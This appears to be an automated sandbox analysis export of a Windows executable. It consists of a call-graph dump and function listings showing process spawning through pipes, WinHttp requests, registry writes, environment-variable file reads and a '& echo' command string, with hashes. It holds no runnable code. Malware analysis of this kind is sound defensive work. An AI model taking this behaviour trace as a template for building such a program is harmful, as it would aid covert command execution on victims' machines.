4060->4060 4061 7ff7327a97dc 16 API calls 4060->4061 4062 7ff7327a9f99 4061->4062 4062->3988 4063 7ff7327a1990 4 API calls 4062->4063 4064 7ff7327a9fac 4063->4064 4064->4064 4065 7ff7327a97dc 16 API calls 4064->4065 4066 7ff7327aa002 4065->4066 4066->3988 4067 7ff7327a1990 4 API calls 4066->4067 4068 7ff7327aa015 4067->4068 4068->4068 4069 7ff7327a97dc 16 API calls 4068->4069 4070 7ff7327aa072 4069->4070 4070->3988 4071 7ff7327a1990 4 API calls 4070->4071 4072 7ff7327aa085 4071->4072 4072->4072 4073 7ff7327a97dc 16 API calls 4072->4073 4074 7ff7327aa0db 4073->4074 4074->3988 4075 7ff7327a1990 4 API calls 4074->4075 4076 7ff7327aa0ee 4075->4076 4076->4076 4077 7ff7327a97dc 16 API calls 4076->4077 4078 7ff7327aa14b 4077->4078 4078->3988 4079 7ff7327a1990 4 API calls 4078->4079 4080 7ff7327aa162 4079->4080 4080->4080 4081 7ff7327a97dc 16 API calls 4080->4081 4082 7ff7327aa1bb 4081->4082 4082->3988 4083 7ff7327a1990 4 API calls 4082->4083 4084 7ff7327aa1d2 4083->4084 4084->4084 4085 7ff7327a97dc 16 API calls 4084->4085 4086 7ff7327aa221 4085->4086 4086->3988 4087 7ff7327a1990 4 API calls 4086->4087 4088 7ff7327aa238 4087->4088 4088->4088 4089 7ff7327a97dc 16 API calls 4088->4089 4090 7ff7327aa289 4089->4090 4090->3988 4091 7ff7327a1990 4 API calls 4090->4091 4092 7ff7327aa2a0 4091->4092 4092->4092 4093 7ff7327a97dc 16 API calls 4092->4093 4094 7ff7327aa2e6 4093->4094 4094->3988 4095 7ff7327a1990 4 API calls 4094->4095 4096 7ff7327aa2fd 4095->4096 4096->4096 4097 7ff7327a97dc 16 API calls 4096->4097 4098 7ff7327aa34b 4097->4098 4098->3988 4099 7ff7327a1990 4 API calls 4098->4099 4100 7ff7327aa365 4099->4100 4100->4100 4101 7ff7327a97dc 16 API calls 4100->4101 4102 7ff7327aa3af 4101->4102 4102->3988 4103 7ff7327a1990 4 API calls 4102->4103 4104 7ff7327aa3c2 4103->4104 4104->4104 4105 7ff7327a97dc 16 API calls 4104->4105 4106 7ff7327aa423 4105->4106 4106->3988 4107 7ff7327a1990 4 API calls 4106->4107 4108 7ff7327aa436 4107->4108 4108->4108 4109 7ff7327a97dc 16 API calls 4108->4109 4110 7ff7327aa485 4109->4110 4110->3988 4111 7ff7327a1990 4 API calls 4110->4111 4112 7ff7327aa494 4111->4112 4112->4112 4113 7ff7327a97dc 16 API calls 4112->4113 4114 7ff7327aa4da 4113->4114 4114->3988 4115 7ff7327aa4de 4114->4115 4206 7ff7327a9478 4115->4206 4222 7ff7327ae7cc 4117->4222 4120 7ff7327ae7cc 2 API calls 4121 7ff7327a9672 4120->4121 4121->3985 4226 7ff7327a2554 4122->4226 4125 7ff7327a90a3 CreatePipe 4127 7ff7327a90c1 4125->4127 4128 7ff7327a90e8 CreatePipe 4125->4128 4126 7ff7327a9069 4130 7ff7327a1990 4 API calls 4126->4130 4133 7ff7327a1990 4 API calls 4127->4133 4129 7ff7327a9106 4128->4129 4132 7ff7327a9130 4128->4132 4134 7ff7327a1990 4 API calls 4129->4134 4131 7ff7327a907d GetLastError 4130->4131 4137 7ff7327a908e 4131->4137 4228 7ff7327a7cfc 4132->4228 4135 7ff7327a90d5 GetLastError 4133->4135 4136 7ff7327a911a GetLastError 4134->4136 4135->4137 4136->4137 4235 7ff7327a1a70 4137->4235 4140 7ff7327a909c 4140->3988 4149 7ff7327a95a0 WaitForSingleObject 4140->4149 4141 7ff7327a917b CreateProcessW 4232 7ff7327a25b4 4141->4232 4143 7ff7327a91c7 4144 7ff7327a91f5 CloseHandle 4143->4144 4145 7ff7327a91cb 4143->4145 4144->4140 4146 7ff7327a1990 4 API calls 4145->4146 4147 7ff7327a91df GetLastError 4146->4147 4148 7ff7327a91f0 4147->4148 4148->4144 4151 7ff7327a95c3 4149->4151 4155 7ff7327a9600 4149->4155 4150 7ff7327a95d4 4152 7ff7327a95ee GetExitCodeProcess 4150->4152 4154 7ff7327a968c 6 API calls 4150->4154 4150->4155 4151->4150 4239 7ff7327a968c PeekNamedPipe 4151->4239 4152->4155 4156 7ff7327a95ea 4154->4156 4155->3992 4156->4152 4156->4155 4158 7ff7327a1990 4 API calls 4157->4158 4159 7ff7327a9813 4158->4159 4159->4159 4160 7ff7327a1990 4 API calls 4159->4160 4161 7ff7327a9877 4160->4161 4253 7ff7327a79f0 4161->4253 4165 7ff7327a988d 4166 7ff7327a25b4 GetProcessHeap HeapFree 4165->4166 4167 7ff7327a9895 4166->4167 4168 7ff7327a1990 GetProcessHeap HeapAlloc GetProcessHeap RtlReAllocateHeap 4167->4168 4169 7ff7327a98a4 4168->4169 4170 7ff7327a9224 15 API calls 4169->4170 4171 7ff7327a98af 4170->4171 4172 7ff7327ae6dc GetProcessHeap HeapAlloc GetProcessHeap RtlReAllocateHeap 4171->4172 4173 7ff7327a98cd 4172->4173 4174 7ff7327ae6dc GetProcessHeap HeapAlloc GetProcessHeap RtlReAllocateHeap 4173->4174 4176 7ff7327a98ed 4174->4176 4175 7ff7327a99cf 4178 7ff7327a1a70 wvsprintfW GetProcessHeap HeapAlloc GetProcessHeap RtlReAllocateHeap 4175->4178 4176->4175 4177 7ff7327a1990 GetProcessHeap HeapAlloc GetProcessHeap RtlReAllocateHeap 4176->4177 4179 7ff7327a993f 4177->4179 4180 7ff7327a99ef 4178->4180 4181 7ff7327a9950 4179->4181 4182 7ff7327a9943 4179->4182 4183 7ff7327a1990 GetProcessHeap HeapAlloc GetProcessHeap RtlReAllocateHeap 4180->4183 4184 7ff7327a79f0 GetProcessHeap HeapAlloc 4181->4184 4185 7ff7327a19e4 GetProcessHeap HeapAlloc GetProcessHeap RtlReAllocateHeap 4182->4185 4186 7ff7327a99fe 4183->4186 4187 7ff7327a9958 4184->4187 4188 7ff7327a994e 4185->4188 4186->3988 4186->3995 4189 7ff7327a19e4 GetProcessHeap HeapAlloc GetProcessHeap RtlReAllocateHeap 4187->4189 4191 7ff7327a1990 GetProcessHeap HeapAlloc GetProcessHeap RtlReAllocateHeap 4188->4191 4190 7ff7327a9966 4189->4190 4192 7ff7327a25b4 GetProcessHeap HeapFree 4190->4192 4193 7ff7327a997d 4191->4193 4192->4188 4194 7ff7327a1990 GetProcessHeap HeapAlloc GetProcessHeap RtlReAllocateHeap 4193->4194 4195 7ff7327a9991 4194->4195 4196 7ff7327a99a2 4195->4196 4197 7ff7327a9995 4195->4197 4198 7ff7327a79f0 GetProcessHeap HeapAlloc 4196->4198 4199 7ff7327a19e4 GetProcessHeap HeapAlloc GetProcessHeap RtlReAllocateHeap 4197->4199 4200 7ff7327a99aa 4198->4200 4201 7ff7327a99a0 4199->4201 4202 7ff7327a19e4 GetProcessHeap HeapAlloc GetProcessHeap RtlReAllocateHeap 4200->4202 4204 7ff7327a1990 GetProcessHeap HeapAlloc GetProcessHeap RtlReAllocateHeap 4201->4204 4203 7ff7327a99b8 4202->4203 4205 7ff7327a25b4 GetProcessHeap HeapFree 4203->4205 4204->4175 4205->4201 4268 7ff7327a971c 4206->4268 4209 7ff7327a94cf 4210 7ff7327a968c 6 API calls 4209->4210 4211 7ff7327a94fc WaitForSingleObject 4209->4211 4213 7ff7327a9540 4209->4213 4220 7ff7327a9534 TerminateProcess 4209->4220 4210->4209 4212 7ff7327a9512 GetSystemTimeAsFileTime 4211->4212 4214 7ff7327a954d 4211->4214 4212->4209 4213->3988 4214->4213 4215 7ff7327a9563 4214->4215 4216 7ff7327a968c 6 API calls 4214->4216 4215->4213 4217 7ff7327a957d GetExitCodeProcess 4215->4217 4218 7ff7327a968c 6 API calls 4215->4218 4216->4215 4217->4213 4219 7ff7327a958f CloseHandle 4217->4219 4221 7ff7327a9579 4218->4221 4219->4213 4220->4213 4221->4213 4221->4217 4225 7ff7327a25dc GetProcessHeap HeapAlloc 4222->4225 4224 7ff7327a965f 4224->4120 4227 7ff7327a2561 CreatePipe 4226->4227 4227->4125 4227->4126 4229 7ff7327a7d0e 4228->4229 4238 7ff7327a25dc GetProcessHeap HeapAlloc 4229->4238 4231 7ff7327a7d1d 4231->4141 4233 7ff7327a25da 4232->4233 4234 7ff7327a25b9 GetProcessHeap HeapFree 4232->4234 4233->4143 4234->4233 4236 7ff7327a1918 4 API calls 4235->4236 4237 7ff7327a1a96 wvsprintfW 4236->4237 4237->4140 4240 7ff7327a96c2 4239->4240 4241 7ff7327a96ca 4239->4241 4240->4241 4246 7ff7327ae6dc 4240->4246 4241->4150 4244 7ff7327a9701 4250 7ff7327ae72c 4244->4250 4247 7ff7327ae6f9 4246->4247 4248 7ff7327a96dc ReadFile 4246->4248 4247->4247 4249 7ff7327a2654 4 API calls 4247->4249 4248->4241 4248->4244 4249->4248 4251 7ff7327ae6dc 4 API calls 4250->4251 4252 7ff7327ae741 4251->4252 4252->4241 4254 7ff7327a7a0d 4253->4254 4256 7ff7327a7a09 4253->4256 4262 7ff7327a25dc GetProcessHeap HeapAlloc 4254->4262 4257 7ff7327a19e4 4256->4257 4263 7ff7327a7dc8 4257->4263 4264 7ff7327a7de9 4263->4264 4267 7ff7327a25dc GetProcessHeap HeapAlloc 4264->4267 4269 7ff7327a974b 4268->4269 4271 7ff7327a94ba GetSystemTimeAsFileTime 4269->4271 4272 7ff7327a97a4 WriteFile 4269->4272 4271->4209 4273 7ff7327a97c7 4272->4273 4273->4269 5001 7ff7327aec08 5002 7ff7327aec1f 5001->5002 5004 7ff7327aec33 5001->5004 5007 7ff7327a25dc GetProcessHeap HeapAlloc 5002->5007 5023 7ff7327a250c 5028 7ff7327a213c 5023->5028 5026 7ff7327a253b 5071 7ff7327a1c80 5028->5071 5031 7ff7327a25b4 2 API calls 5032 7ff7327a219e 5031->5032 5033 7ff7327a24e6 5032->5033 5034 7ff7327a21ba WinHttpCrackUrl 5032->5034 5033->5026 5060 7ff7327a1eec 5033->5060 5035 7ff7327a21e6 5034->5035 5036 7ff7327a24dd WinHttpCloseHandle 5034->5036 5037 7ff7327a21f7 WinHttpConnect 5035->5037 5036->5033 5037->5036 5038 7ff7327a2225 5037->5038 5038->5038 5039 7ff7327a228b WinHttpOpenRequest 5038->5039 5040 7ff7327a22ba 5039->5040 5041 7ff7327a24cd WinHttpCloseHandle 5039->5041 5042 7ff7327a22c0 WinHttpQueryOption WinHttpSetOption 5040->5042 5043 7ff7327a2304 WinHttpSendRequest 5040->5043 5041->5036 5042->5043 5044 7ff7327a24c4 WinHttpCloseHandle 5043->5044 5045 7ff7327a232b WinHttpReceiveResponse 5043->5045 5044->5041 5045->5044 5046 7ff7327a233e 5045->5046 5047 7ff7327ae7cc 2 API calls 5046->5047 5048 7ff7327a234d WinHttpQueryDataAvailable 5047->5048 5049 7ff7327ae6dc 4 API calls 5048->5049 5050 7ff7327a236d WinHttpReadData 5049->5050 5051 7ff7327a238b 5050->5051 5051->5048 5052 7ff7327ae72c 4 API calls 5051->5052 5054 7ff7327a239f 5051->5054 5052->5051 5053 7ff7327a24ba 5053->5044 5054->5053 5075 7ff7327a7a60 5054->5075 5099 7ff7327a1de8 5060->5099 5063 7ff7327a2121 5063->5026 5064 7ff7327a1f5e SysAllocString SafeArrayCreateVector SafeArrayAccessData 5065 7ff7327a262c 5064->5065 5066 7ff7327a1fa8 SafeArrayUnaccessData 5065->5066 5069 7ff7327a1fd9 5066->5069 5067 7ff7327a1ffe SysFreeString 5067->5063 5069->5067 5070 7ff7327a1cbc 11 API calls 5069->5070 5070->5067 5072 7ff7327a1ca1 5071->5072 5073 7ff7327a1ca5 WinHttpOpen 5072->5073 5074 7ff7327a79f0 2 API calls 5072->5074 5073->5031 5074->5073 5076 7ff7327a24a5 5075->5076 5077 7ff7327a7a84 5075->5077 5079 7ff7327a1cbc 5076->5079 5087 7ff7327a25dc GetProcessHeap HeapAlloc 5077->5087 5088 7ff7327aa520 5079->5088 5089 7ff7327aa551 5088->5089 5098 7ff7327a25dc GetProcessHeap HeapAlloc 5089->5098 5105 7ff7327a1b74 5099->5105 5101 7ff7327a1e06 RegCreateKeyExA 5102 7ff7327a1e3f CoInitializeEx VariantInit CoCreateInstance 5101->5102 5103 7ff7327a1e46 5101->5103 5102->5063 5102->5064 5103->5103 5104 7ff7327a1ea2 RegSetValueExA RegCloseKey 5103->5104 5104->5102 5106 7ff7327a1bc3 5105->5106 5106->5101 5107 7ff7327adc0c 5108 7ff7327adc60 5107->5108 5109 7ff7327a1990 4 API calls 5108->5109 5110 7ff7327adc96 5109->5110 5111 7ff7327a1990 4 API calls 5110->5111 5112 7ff7327adcad 5111->5112 5235 7ff7327acbf4 RegOpenKeyExW 5112->5235 5114 7ff7327adccd 5115 7ff7327a1990 4 API calls 5114->5115 5116 7ff7327add30 5115->5116 5117 7ff7327a1990 4 API calls 5116->5117 5118 7ff7327add47 5117->5118 5119 7ff7327accf8 6 API calls 5118->5119 5120 7ff7327add6c 5119->5120 5121 7ff7327adeb3 5120->5121 5123 7ff7327add80 PathCombineW PathFileExistsW 5120->5123 5122 7ff7327a1990 4 API calls 5121->5122 5124 7ff7327adec2 5122->5124 5125 7ff7327adda6 PathQuoteSpacesW 5123->5125 5126 7ff7327adea0 5123->5126 5130 7ff7327a1990 4 API calls 5124->5130 5241 7ff7327acff0 5125->5241 5127 7ff7327a25b4 2 API calls 5126->5127 5127->5121 5129 7ff7327addbc lstrcatW 5243 7ff7327ae8a4 5129->5243 5132 7ff7327aded9 5130->5132 5133 7ff7327acbf4 4 API calls 5132->5133 5135 7ff7327adef2 5133->5135 5137 7ff7327a1990 4 API calls 5135->5137 5136 7ff7327a9644 2 API calls 5138 7ff7327adde6 5136->5138 5139 7ff7327adf0e 5137->5139 5138->5138 5141 7ff7327a900c 16 API calls 5138->5141 5140 7ff7327a1990 4 API calls 5139->5140 5142 7ff7327adf1d 5140->5142 5143 7ff7327ade3b 5141->5143 5145 7ff7327a1990 4 API calls 5142->5145 5144 7ff7327a95a0 8 API calls 5143->5144 5148 7ff7327ade81 5143->5148 5146 7ff7327ade50 5144->5146 5147 7ff7327adf34 5145->5147 5149 7ff7327ade77 5146->5149 5150 7ff7327a97dc 16 API calls 5146->5150 5151 7ff7327adf40 GetEnvironmentVariableW 5147->5151 5153 7ff7327a25b4 2 API calls 5148->5153 5152 7ff7327a9478 13 API calls 5149->5152 5154 7ff7327ade64 5150->5154 5155 7ff7327adf69 5151->5155 5156 7ff7327ae1e7 5151->5156 5152->5148 5153->5126 5154->5149 5160 7ff7327a1990 4 API calls 5154->5160 5158 7ff7327adf75 PathAppendW PathFileExistsW 5155->5158 5157 7ff7327a1990 4 API calls 5156->5157 5159 7ff7327ae1f6 5157->5159 5158->5156 5161 7ff7327adf9a CreateFileW 5158->5161 5164 7ff7327a1990 4 API calls 5159->5164 5160->5149 5161->5156 5162 7ff7327adfcf GetFileSize 5161->5162 5250 7ff7327a25dc GetProcessHeap HeapAlloc 5162->5250 5166 7ff7327ae20d 5164->5166 5169 7ff7327acbf4 4 API calls 5166->5169 5171 7ff7327ae22a 5169->5171 5173 7ff7327a1990 4 API calls 5171->5173 5175 7ff7327ae246 5173->5175 5178 7ff7327a1990 4 API calls 5175->5178 5180 7ff7327ae25d 5178->5180 5184 7ff7327ae269 GetEnvironmentVariableW 5180->5184 5185 7ff7327ae37c 5184->5185 5186 7ff7327ae28c 5184->5186 5188 7ff7327a1990 4 API calls 5185->5188 5191 7ff7327ae298 PathAppendW PathFileExistsW 5186->5191 5192 7ff7327ae38b 5188->5192 5191->5185 5194 7ff7327ae2bd CreateFileW 5191->5194 5196 7ff7327a1990 4 API calls 5192->5196 5194->5185 5199 7ff7327ae2f2 GetFileSize 5194->5199 5201 7ff7327ae39a 5196->5201 5251 7ff7327a2588 GetProcessHeap HeapAlloc 5199->5251 5236 7ff7327accd7 5235->5236 5237 7ff7327acc47 RegEnumKeyExW 5235->5237 5236->5114 5238 7ff7327acc7d RegEnumKeyExW 5237->5238 5239 7ff7327acccc RegCloseKey 5237->5239 5238->5239 5239->5236 5242 7ff7327ad04b 5241->5242 5242->5129 5244 7ff7327ae7cc 2 API calls 5243->5244 5245 7ff7327ae8c3 5244->5245 5252 7ff7327ae750 5245->5252 5248 7ff7327ae6dc 4 API calls 5249 7ff7327addd9 5248->5249 5249->5136 5253 7ff7327ae797 5252->5253 5254 7ff7327ae76b 5252->5254 5253->5248 5254->5253 5255 7ff7327ae6dc 4 API calls 5254->5255 5255->5254

                                                                                                        Executed Functions

                                                                                                        Function 00007FF7327A9224 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 158synchronizationtimeCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 129 7ff7327a9224-7ff7327a9306 GetSystemTimeAsFileTime call 7ff7327a9a20 * 3 call 7ff7327a9a98 call 7ff7327a2698 call 7ff7327a25dc call 7ff7327a7b34 * 4 call 7ff7327a971c call 7ff7327a25b4 154 7ff7327a9309-7ff7327a9317 129->154 155 7ff7327a9329-7ff7327a9330 154->155 156 7ff7327a9319-7ff7327a931c call 7ff7327a968c 154->156 158 7ff7327a9332-7ff7327a9335 155->158 159 7ff7327a938c-7ff7327a9393 155->159 163 7ff7327a9321-7ff7327a9323 156->163 158->159 160 7ff7327a9337-7ff7327a9351 158->160 161 7ff7327a93a2-7ff7327a93b6 WaitForSingleObject 159->161 162 7ff7327a9395-7ff7327a9399 call 7ff7327a968c 159->162 164 7ff7327a9382-7ff7327a9386 160->164 165 7ff7327a9353-7ff7327a9365 call 7ff7327a7b50 160->165 167 7ff7327a93f5 161->167 168 7ff7327a93b8-7ff7327a93ca GetSystemTimeAsFileTime 161->168 172 7ff7327a939e-7ff7327a93a0 162->172 163->155 163->167 164->159 171 7ff7327a9418-7ff7327a942c WaitForSingleObject 164->171 177 7ff7327a9374-7ff7327a9380 165->177 178 7ff7327a9367-7ff7327a936e 165->178 170 7ff7327a93f7-7ff7327a9417 167->170 168->154 173 7ff7327a93d0-7ff7327a93e3 call 7ff7327a9a98 168->173 171->167 175 7ff7327a942e-7ff7327a9434 171->175 172->161 172->167 173->154 182 7ff7327a93e9-7ff7327a93ef TerminateProcess 173->182 179 7ff7327a9442-7ff7327a9449 175->179 180 7ff7327a9436-7ff7327a9439 call 7ff7327a968c 175->180 177->164 177->165 178->171 178->177 184 7ff7327a9458-7ff7327a9468 GetExitCodeProcess 179->184 185 7ff7327a944b-7ff7327a944f call 7ff7327a968c 179->185 186 7ff7327a943e-7ff7327a9440 180->186 182->167 188 7ff7327a9473-7ff7327a9475 184->188 189 7ff7327a946a-7ff7327a9471 184->189 190 7ff7327a9454-7ff7327a9456 185->190 186->167 186->179 188->170 189->167 189->188 190->167 190->184
                                                                                                        APIs
                                                                                                        • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000002,?), ref: 00007FF7327A924D
                                                                                                          • Part of subcall function 00007FF7327A25DC: GetProcessHeap.KERNEL32(?,?,?,00007FF7327A1985,?,?,?,00007FF7327A155F), ref: 00007FF7327A25E5
                                                                                                          • Part of subcall function 00007FF7327A25B4: GetProcessHeap.KERNEL32 ref: 00007FF7327A25C1
                                                                                                          • Part of subcall function 00007FF7327A25B4: HeapFree.KERNEL32 ref: 00007FF7327A25CF
                                                                                                        • WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000002,?), ref: 00007FF7327A93AB
                                                                                                        • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000002,?), ref: 00007FF7327A93C0
                                                                                                        • TerminateProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000002,?), ref: 00007FF7327A93EF
                                                                                                          • Part of subcall function 00007FF7327A968C: PeekNamedPipe.KERNELBASE ref: 00007FF7327A96B8
                                                                                                        • WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000002,?), ref: 00007FF7327A9421
                                                                                                        • GetExitCodeProcess.KERNELBASE ref: 00007FF7327A9460
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.4176871660.00007FF7327A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7327A0000, based on PE: true
                                                                                                        • Associated: 0000000A.00000002.4176808164.00007FF7327A0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.4176947542.00007FF7327B1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.4176988341.00007FF7327B4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.4177025957.00007FF7327B5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_7ff7327a0000_9245.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ProcessTime$Heap$FileObjectSingleSystemWait$CodeExitFreeNamedPeekPipeTerminate
                                                                                                        • String ID: & echo
                                                                                                        • API String ID: 2711250446-3491486023
                                                                                                        • Opcode ID: 0e5a6491b23a52f077622e03fa1d9963b355e200ccccf575446c2c7b3acaf6c1
                                                                                                        • Instruction ID: 315f2f2320e971343fb49f87d1d33a5df2faf8225b1037a4b9c90700cdcfafa8
                                                                                                        • Opcode Fuzzy Hash: 0e5a6491b23a52f077622e03fa1d9963b355e200ccccf575446c2c7b3acaf6c1
                                                                                                        • Instruction Fuzzy Hash: 0D515325B09642E1EEA0EB16E5542BAE361FF8AB90FC44031CB4E47B95DEBCF455D320
                                                                                                        Function 00007FF7327A7138 Relevance: 4.5, APIs: 3, Instructions: 38comCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.4176871660.00007FF7327A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7327A0000, based on PE: true
                                                                                                        • Associated: 0000000A.00000002.4176808164.00007FF7327A0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.4176947542.00007FF7327B1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.4176988341.00007FF7327B4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000A.00000002.4177025957.00007FF7327B5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_7ff7327a0000_9245.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Initialize$CreateInstanceSecurity
                                                                                                        • String ID:
                                                                                                        • API String ID: 89549506-0
                                                                                                        • Opcode ID: b06b60c75a0e364457e69cf4407a40afd88aa559a7b63d120074e74016c78773
                                                                                                        • Instruction ID: 2f13cdb1168a959019622b053d0c5ce6ac21af0f7ca7c3abf4fd9f1c065ccc8b
                                                                                                        • Opcode Fuzzy Hash: b06b60c75a0e364457e69cf4407a40afd88aa559a7b63d120074e74016c78773
                                                                                                        • Instruction Fuzzy Hash: 7C118C73A14640DAF710DF61E8593AE7774F348B0DF608218EB491A958CF7CD245CB94
                                                                                                        Function 00007FF7327A9AC8 Relevance: 4.4, Strings: 3, Instructions: 664COMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 371 7ff7327a9ac8-7ff7327a9b3f call 7ff7327a8800 call 7ff7327a1990 call 7ff7327a9644 call 7ff7327a26b0 380 7ff7327a9b43-7ff7327a9b54 371->380 380->380 381 7ff7327a9b56-7ff7327a9b67 call 7ff7327a900c 380->381 384 7ff7327aa4e7-7ff7327aa51f call 7ff7327a9624 call 7ff7327a1990 381->384 385 7ff7327a9b6d-7ff7327a9b7f call 7ff7327a95a0 381->385 385->384 391 7ff7327a9b85-7ff7327a9b9f call 7ff7327a8258 call 7ff7327a97dc 385->391 391->384 397 7ff7327a9ba5-7ff7327a9bd1 call 7ff7327a1990 call 7ff7327a8938 call 7ff7327a97dc 391->397 397->384 404 7ff7327a9bd7-7ff7327a9bfc call 7ff7327a1990 call 7ff7327a7fd4 call 7ff7327a97dc 397->404 404->384 411 7ff7327a9c02-7ff7327a9c27 call 7ff7327a1990 call 7ff7327a8bc0 call 7ff7327a97dc 404->411 411->384 418 7ff7327a9c2d-7ff7327a9c52 call 7ff7327a1990 call 7ff7327a7f4c call 7ff7327a97dc 411->418 418->384 425 7ff7327a9c58-7ff7327a9c7d call 7ff7327a1990 call 7ff7327a839c call 7ff7327a97dc 418->425 425->384 432 7ff7327a9c83-7ff7327a9ca8 call 7ff7327a1990 call 7ff7327a8d80 call 7ff7327a97dc 425->432 432->384 439 7ff7327a9cae-7ff7327a9cd3 call 7ff7327a1990 call 7ff7327a8e14 call 7ff7327a97dc 432->439 439->384 446 7ff7327a9cd9-7ff7327a9cfe call 7ff7327a1990 call 7ff7327a8a88 call 7ff7327a97dc 439->446 446->384 453 7ff7327a9d04-7ff7327a9d29 call 7ff7327a1990 call 7ff7327a89d8 call 7ff7327a97dc 446->453 453->384 460 7ff7327a9d2f-7ff7327a9d54 call 7ff7327a1990 call 7ff7327a8510 call 7ff7327a97dc 453->460 460->384 467 7ff7327a9d5a-7ff7327a9d7f call 7ff7327a1990 call 7ff7327a81c4 call 7ff7327a97dc 460->467 467->384 474 7ff7327a9d85-7ff7327a9daa call 7ff7327a1990 call 7ff7327a8114 call 7ff7327a97dc 467->474 474->384 481 7ff7327a9db0-7ff7327a9dd5 call 7ff7327a1990 call 7ff7327a85c0 call 7ff7327a97dc 474->481 481->384 488 7ff7327a9ddb-7ff7327a9e29 call 7ff7327a1990 call 7ff7327a26b0 481->488 493 7ff7327a9e2c-7ff7327a9e3b 488->493 493->493 494 7ff7327a9e3d-7ff7327a9e4e call 7ff7327a97dc 493->494 494->384 497 7ff7327a9e54-7ff7327a9e97 call 7ff7327a1990 call 7ff7327a26b0 494->497 502 7ff7327a9e9a-7ff7327a9ea9 497->502 502->502 503 7ff7327a9eab-7ff7327a9ebc call 7ff7327a97dc 502->503 503->384 506 7ff7327a9ec2-7ff7327a9f0c call 7ff7327a1990 call 7ff7327a26b0 503->506 511 7ff7327a9f0f-7ff7327a9f1e 506->511 511->511 512 7ff7327a9f20-7ff7327a9f31 call 7ff7327a97dc 511->512 512->384 515 7ff7327a9f37-7ff7327a9f76 call 7ff7327a1990 call 7ff7327a26b0 512->515 520 7ff7327a9f79-7ff7327a9f88 515->520 520->520 521 7ff7327a9f8a-7ff7327a9f9b call 7ff7327a97dc 520->521 521->384 524 7ff7327a9fa1-7ff7327a9fde call 7ff7327a1990 call 7ff7327a26b0 521->524 529 7ff7327a9fe2-7ff7327a9ff1 524->529 529->529 530 7ff7327a9ff3-7ff7327a9ffd call 7ff7327a97dc 529->530 532 7ff7327aa002-7ff7327aa004 530->532 532->384 533 7ff7327aa00a-7ff7327aa04f call 7ff7327a1990 call 7ff7327a26b0 532->533 538 7ff7327aa052-7ff7327aa061 533->538 538->538 539 7ff7327aa063-7ff7327aa074 call 7ff7327a97dc 538->539 539->384 542 7ff7327aa07a-7ff7327aa0b8 call 7ff7327a1990 call 7ff7327a26b0 539->542 547 7ff7327aa0bb-7ff7327aa0ca 542->547 547->547 548 7ff7327aa0cc-7ff7327aa0dd call 7ff7327a97dc 547->548 548->384 551 7ff7327aa0e3-7ff7327aa127 call 7ff7327a1990 call 7ff7327a26b0 548->551 556 7ff7327aa12b-7ff7327aa13a 551->556 556->556 557 7ff7327aa13c-7ff7327aa14d call 7ff7327a97dc 556->557 557->384 560 7ff7327aa153-7ff7327aa195 call 7ff7327a1990 call 7ff7327a26b0 557->560 565 7ff7327aa19b-7ff7327aa1aa 560->565 565->565 566 7ff7327aa1ac-7ff7327aa1bd call 7ff7327a97dc 565->566 566->384 569 7ff7327aa1c3-7ff7327aa1fb call 7ff7327a1990 call 7ff7327a26b0 566->569 574 7ff7327aa201-7ff7327aa210 569->574 574->574 575 7ff7327aa212-7ff7327aa223 call 7ff7327a97dc 574->575 575->384 578 7ff7327aa229-7ff7327aa266 call 7ff7327a1990 call 7ff7327a26b0 575->578 583 7ff7327aa269-7ff7327aa278 578->583 583->583 584 7ff7327aa27a-7ff7327aa28b call 7ff7327a97dc 583->584 584->384 587 7ff7327aa291-7ff7327aa2c3 call 7ff7327a1990 call 7ff7327a26b0 584->587 592 7ff7327aa2c6-7ff7327aa2d5 587->592 592->592 593 7ff7327aa2d7-7ff7327aa2e8 call 7ff7327a97dc 592->593 593->384 596 7ff7327aa2ee-7ff7327aa328 call 7ff7327a1990 call 7ff7327a26b0 593->596 601 7ff7327aa32b-7ff7327aa33a 596->601 601->601 602 7ff7327aa33c-7ff7327aa34d call 7ff7327a97dc 601->602 602->384 605 7ff7327aa353-7ff7327aa38c call 7ff7327a1990 call 7ff7327a26b0 602->605 610 7ff7327aa38f-7ff7327aa39e 605->610 610->610 611 7ff7327aa3a0-7ff7327aa3b1 call 7ff7327a97dc 610->611 611->384 614 7ff7327aa3b7-7ff7327aa400 call 7ff7327a1990 call 7ff7327a26b0 611->614 619 7ff7327aa403-7ff7327aa412 614->619 619->619 620 7ff7327aa414-7ff7327aa425 call 7ff7327a97dc 619->620 620->384 623 7ff7327aa42b-7ff7327aa461 call 7ff7327a1990 call 7ff7327a26b0 620->623 628 7ff7327aa464-7ff7327aa474 623->628 